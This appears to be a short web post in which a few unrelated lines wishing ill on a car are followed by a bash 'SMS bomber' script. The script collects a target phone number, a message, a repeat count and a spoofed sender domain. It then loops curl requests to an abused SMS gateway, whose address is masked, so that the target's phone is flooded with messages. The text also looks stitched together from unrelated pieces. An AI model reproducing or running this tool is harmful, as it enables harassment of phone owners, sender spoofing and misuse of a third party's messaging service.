Yes!
My WORST wishes with that car!
May this car never be successfull for us...
:((:((:((
###################################################
## Maku's SMS bomber
## Released under GPL
###################################################
clear
bold=`tput smso`
offbold=`tput rmso`
echo "${bold}"
echo -e " SMS Bomber "
echo "${offbold}"
echo -e "Enter 1st 4 digits of cell number: \c"
read num1
echo -e "Enter rest of digits of cell number: \c"
read num2
echo -e "Enter your name: \c"
read name
echo -e "Enter \"from Domain\" (example: yahoo.com): \c"
read domain
echo -e "Enter your message (single line of text): \c"
read message
echo -e "How many times to send: \c"
read numBomb
echo -e "Bombing ${bold} $num1$num2 ${offbold},\c"
echo -e "$numBomb times from $name@$domain...\n"
while [ $numBomb -ne 0 ]
do
# Make this as a single line# Make this as a single line
curl -d "prefix=`echo $num1`&suffix=`echo $num2`&name=`echo $name`
&email=`echo $name`%40`echo $domain`&message=`echo $message`
&confirmation=no&char_count=4&sub=Send+SMS" http://aa.bb.cc.dd/
cell/smsgateway.asp > /dev/null 2>&1
# Sorry, i cant disclose that IP address! Security concerns!
# Figure it out yourself (google) & then use it!
echo "Sending SMS to $num1$num2 -- $numBomb"
numBomb=`echo $numBomb-1 | bc`
done
echo "${bold}"
echo -e " Thank you for using SMS Bomber "
echo "${offbold}"
###################################################